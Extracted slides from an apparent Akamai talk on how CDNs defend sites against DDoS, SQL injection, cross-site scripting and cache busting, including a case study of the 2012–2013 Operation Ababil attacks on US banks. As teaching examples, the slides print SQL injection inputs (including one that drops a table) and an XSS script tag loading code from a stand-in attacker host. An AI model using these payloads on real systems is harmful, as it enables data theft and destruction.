The Role of Content Delivery Networks in Protecting Web Sites from Attacks
advertisement
The Role of Content Delivery Networks in Protecting Web Sites from Attacks Bruce Maggs VP for Research, Akamai Technologies Distributed Denial of Service (DDOS) Attacks The attacker hopes to overwhelm the content provider’s resources with requests for service. Sometimes the attacker employs a “bot army” of compromised machines. The attacker tries to issue requests for content that cannot be cached. The attacker looks for “amplification” where an easy-to-generate request requires a difficult-to-generate response. ©2013 AKAMAI | FASTER FORWARDTM Attack Frequency (Attacks Detected and Mitigated) 2014 2013 2012 2011 2010 991 1317 2002 2936 ©2013 AKAMAI | FASTER FORWARDTM 5634 Largest Attacks by Year 2014 320 270 2013 190 144 Gbps Mpps 2005 11 2 2010 2008 2006 2007 18 22 8 11 2009 48 39 29 2011 2012 79 82 68 69 38 15 ©2013 AKAMAI | FASTER FORWARDTM 45 Attack Types Q3 2014 ©2013 AKAMAI | FASTER FORWARDTM Attack Origins Q3 2014 Russia 2.97% Japan 4.10% India 2.81% Thailand 2.43% US 23.95% Germany 5.78% Korea 6.13% China 20.07% Mexico 14.16% Brazil 17.60% ©2013 AKAMAI | FASTER FORWARDTM Targeted Industry Sectors Business Services 0.20% Software & Technology 19.44% Public Sector 1.40% Education 2.20% Financial Services 9.22% Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. Gaming 33.67% Media & Entertainment 23.65% Internet & Telecom 8.82% Health Care & Life Hotel & Travel Sciences 1.20% 0.20% ©2013 AKAMAI | FASTER FORWARDTM The Akamai Platform Provides a Perimeter Defense Origin Server End User Origin Traffic Akamai Traffic 10000 10000 1000 1000 100 100 10 10 1 1 ©2013 AKAMAI | FASTER FORWARDTM Defeating HTTP flooding attacks – Rate Controls 1. Count the number of Forward Requests 2. Block any IP address with excessive forward requests Akamai Edge Server Customer Origin Forward Request Client Request X Custom Error page Forward Response ©2013 AKAMAI | FASTER FORWARDTM Filtering Out Malformed Requests • SQL injection attacks • Cross-site scripting (XSS) attacks • Cache busting attacks ©2013 AKAMAI | FASTER FORWARDTM Relational databases Relational databases store tables consisting of rows and columns. (image from http://support.sas.com) ©2013 AKAMAI | FASTER FORWARDTM Structured Query Language (SQL) Example Query: SELECT * FROM Employees WHERE LName = ’PARKER’; IdNum 1354 LName PARKER FName MARY JobCode FA3 ©2013 AKAMAI | FASTER FORWARDTM Salary 65800 Phone 914/455-2337 Example SQL Injection Suppose a program creates the following SQL query, where userName is a variable holding input provided by an end-user, e.g., through a form on a Web page. SELECT * FROM Employees WHERE LName = ’” + userName + ”’;” But instead of entering a name like PARKER the user enters ’ or ’1’=’1 Then the query becomes SELECT * FROM Employees WHERE LName = ’’ or ’1’=’1’; This query returns all rows in the Employees table! ©2013 AKAMAI | FASTER FORWARDTM A More Destructive Injection Same code as before: SELECT * FROM Employees WHERE LName = ’” + userName + ”’;” But now suppose the user enters a’; DROP TABLE Employees Then the query becomes SELECT * FROM Employees WHERE LName = ’a’; DROP TABLE Employees; This query might delete the Employees table! (Not all databases allow two queries in the same string.) ©2013 AKAMAI | FASTER FORWARDTM bobby-tables.com: A guide to preventing SQL injection (from the comic strip xkcd) ©2013 AKAMAI | FASTER FORWARDTM Cross-Site Scripting Attacker types this into text entry form: <script src=http://theftsRus.com/script.js></script> Attacker hopes that later the site will insert this into the HTML that it outputs, and then the victim’s browser will execute the script. ©2013 AKAMAI | FASTER FORWARDTM Cache Busting Attacker adds query strings to the end of a requested URL, e.g., http://ak.xyz.com/logo.gif?id=832164328 Attacker hopes that the CDN will view each request with a different query string as a request for a different object, and fetch a new copy from the content provider. ©2013 AKAMAI | FASTER FORWARDTM Operation Ababil “none of the U.S banks will be safe from our attacks” Phase 1 Sep 12 – Early Nov 2012 • DNS packets with “AAAAA” payload • Limited Layer 7 attacks • Early-mid Oct 2012 announced names of banks where attacks succeeded • (Did not announce bank names if attacks were unsuccessful) • Began use of HTTP dynamic content to circumvent static caching defenses Phase 2 Dec 12, 2012 – Jan 29 • Incorporate random query strings and values • Addition of random query strings against PDFs • Additions to bot army • Burst probes to bypass rate-limiting controls • Addition of valid argument names, random values Phase 3 Late Feb 2013 – May 2013 • Multiple probes • Multiple targets • Increased focus on Layer 7 attacks • Target banks where attacks work • Fraudsters take advantage ©2013 AKAMAI | FASTER FORWARDTM Phase 4 July 2013 – • Used fake plug-ins to infect files Phase 1 Attack – Sept 2012 DNS Traffic Handled by Akamai 1.8 M Attack Traffic: 1.6 M 23 Gbps 1.4 M (10,000X normal) 1.2 M 1.0 M 0.8 M Duration: 4.5 Hours 0.6 M 0.4 M High volume of non-standard packets sent to UDP port 53 Packets did not include a valid DNS header Packets consisted of large blocks of repeating “A”s The packets were abnormally large Simultaneously, a SYN-Flood was directed against TCP port 53 0.2 M s 0.0 Tues 12:00 Wed 00:00 Total eDNS 22 ©2013 AKAMAI | FASTER FORWARDTM Wed12:00 Phase 2 Attacks - January 2nd, 2013 Bank #1 Bank #2 Bank #3 Bank #4 Bank #5 QCF targeted PDF files Akamai Dynamic Caching Rules offloaded 100% of the traffic No Origin Impact ©2013 AKAMAI | FASTER FORWARDTM Phase 2 Attacks - January 2nd, 2013 Bank #1 Bank #2 Bank #3 Bank #4 Bank #5 QCF targeted marketing web pages Rate controls automatically activated Attack was deflected, far from bank’s datacenter No Origin Impact ©2013 AKAMAI | FASTER FORWARDTM Phase 2 Attacks - January 2nd, 2013 Bank #1 Bank #2 Bank #3 Bank #4 Bank #5 QCF targeted SSL Akamai offloaded 99% of the traffic No Origin Impact ©2013 AKAMAI | FASTER FORWARDTM Phase 2 Attacks - January 2nd, 2013 NOT on Akamai Bank #1 Bank #2 Bank #3 Gomez agents in 12 cities measuring hourly 12:03 PM Bank #4 Bank #5 Error/Outage—site not responding ©2013 AKAMAI | FASTER FORWARDTM 9:00 AM Phase 2 Attacks - January 2nd, 2013 NOT on Akamai Bank #1 Bank #2 Bank #3 Gomez agents in 12 cities measuring hourly 12:44 PM Bank #4 Bank #5 Error/Outage—site not responding ©2013 AKAMAI | FASTER FORWARDTM 6:21 PM Phase 3 Attack Example • Attack started at March 5, 2013 morning • Peak Attack Traffic > 126 thousand requests per second • 70x normal Edge Bandwidth (29Gbps) • Origin Traffic stayed at normal levels • ~2000 Agents participated in the 20 minute assault • 80% of the agents were new IP addresses that had not participated in earlier campaigns ©2013 AKAMAI | FASTER FORWARDTM Attack Tactics - Pre-attack Reconnaissance Attackers test the site with short burst high speed probes • Short bursts of attack requests on non-cacheable content every 10 minutes • Peak of 18 million requests per second If the site falters, they announce that they will attack that bank and return later with a full scale attack If the site is resilient they move on ©2013 AKAMAI | FASTER FORWARDTM Observations Due to recent attack sizes, infrastructure capacity build out is not economical, and may not work anyway • Attacks range from 13X to 70X normal traffic, 25X to 120X normal request volume The burst speed of attacks has become too fast for reactive mitigation – a proactive “always-on” defense is necessary ©2013 AKAMAI | FASTER FORWARDTM
